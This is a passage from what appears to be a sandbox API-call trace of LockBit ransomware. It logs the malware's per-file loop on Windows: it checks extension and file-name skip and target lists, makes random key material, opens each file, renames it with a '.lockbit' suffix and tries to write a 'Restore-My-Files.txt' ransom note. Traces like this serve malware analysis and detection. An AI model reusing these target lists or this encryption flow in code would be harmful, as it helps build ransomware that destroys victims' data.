lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.441] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.441] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.441] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.442] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.442] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.442] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.442] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.442] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.442] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.442] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.442] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.442] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.442] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382958.JPG") returned 1 [0160.442] lstrcmpiW (lpString1="ntldr", lpString2="J0382958.JPG") returned 1 [0160.442] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382958.JPG") returned 1 [0160.442] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382958.JPG") returned -1 [0160.442] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382958.JPG") returned -1 [0160.442] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382958.JPG") returned 1 [0160.443] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382958.JPG") returned -1 [0160.443] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.443] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382958.JPG") returned=".JPG" [0160.443] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.443] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.443] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.443] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.443] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.443] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.443] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.443] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.443] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.443] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.443] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.443] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.444] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.444] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.444] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.444] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.444] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382958.JPG.lockbit") returned 72 [0160.444] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382958.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382958.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.445] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.445] malloc (_Size=0x40068) returned 0x3df0008 [0160.445] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=103399) returned 1 [0160.445] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.446] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.447] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.451] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382958.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382958.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.451] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.451] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0160.455] free (_Block=0x1fa2ed8) [0160.455] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382958.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.455] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.455] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.455] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661d4d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x14f8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382959.JPG", cAlternateFileName="")) returned 1 [0160.455] lstrcmpiW (lpString1=".", lpString2="J0382959.JPG") returned -1 [0160.455] lstrcmpiW (lpString1="..", lpString2="J0382959.JPG") returned -1 [0160.455] PathFindExtensionW (pszPath="J0382959.JPG") returned=".JPG" [0160.455] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.455] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.455] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.455] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.455] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.455] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.455] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.455] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.455] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.455] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.455] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.455] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.455] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.455] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.455] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.455] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.456] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.456] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.457] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382959.JPG") returned 1 [0160.457] lstrcmpiW (lpString1="ntldr", lpString2="J0382959.JPG") returned 1 [0160.457] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382959.JPG") returned 1 [0160.457] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382959.JPG") returned -1 [0160.457] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382959.JPG") returned -1 [0160.457] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382959.JPG") returned 1 [0160.457] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382959.JPG") returned -1 [0160.457] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.457] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382959.JPG") returned=".JPG" [0160.457] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.457] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.457] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.457] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.457] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.457] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.457] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.457] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.457] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.457] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.457] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.458] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.458] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.458] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.458] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.458] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.458] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382959.JPG.lockbit") returned 72 [0160.458] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382959.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382959.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.459] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.459] malloc (_Size=0x40068) returned 0x3df0008 [0160.459] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=85898) returned 1 [0160.459] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.461] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382959.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382959.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0160.467] malloc (_Size=0xa6) returned 0x1fa2ed8 [0160.467] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0160.468] free (_Block=0x1fa2ed8) [0160.468] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382959.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0160.468] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0160.468] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0160.468] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1a3f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382960.JPG", cAlternateFileName="")) returned 1 [0160.468] lstrcmpiW (lpString1=".", lpString2="J0382960.JPG") returned -1 [0160.468] lstrcmpiW (lpString1="..", lpString2="J0382960.JPG") returned -1 [0160.468] PathFindExtensionW (pszPath="J0382960.JPG") returned=".JPG" [0160.468] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0160.468] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0160.468] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0160.468] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0160.468] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0160.468] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0160.468] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0160.468] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0160.468] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0160.468] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0160.468] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0160.468] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0160.468] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0160.468] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0160.469] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0160.469] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0160.469] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0160.469] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0160.469] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0160.469] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0160.469] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0160.469] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0160.469] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0160.469] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0160.469] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.469] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0160.469] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0160.469] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0160.469] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0160.469] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0160.469] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0160.470] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0160.470] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0160.470] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0160.470] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0160.470] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0160.470] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0160.470] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382960.JPG") returned 1 [0160.470] lstrcmpiW (lpString1="ntldr", lpString2="J0382960.JPG") returned 1 [0160.470] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382960.JPG") returned 1 [0160.471] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382960.JPG") returned -1 [0160.471] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382960.JPG") returned -1 [0160.471] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382960.JPG") returned 1 [0160.471] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382960.JPG") returned -1 [0160.471] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0160.471] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382960.JPG") returned=".JPG" [0160.471] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0160.471] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0160.471] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0160.471] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0160.471] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0160.471] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0160.471] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0160.471] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0160.471] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0160.471] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0160.472] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0160.472] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0160.472] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0160.472] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0160.472] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0160.472] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0160.472] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382960.JPG.lockbit") returned 72 [0160.472] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382960.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382960.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0160.474] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0160.474] malloc (_Size=0x40068) returned 0x3df0008 [0160.474] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=107508) returned 1 [0160.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0160.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0160.475] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, 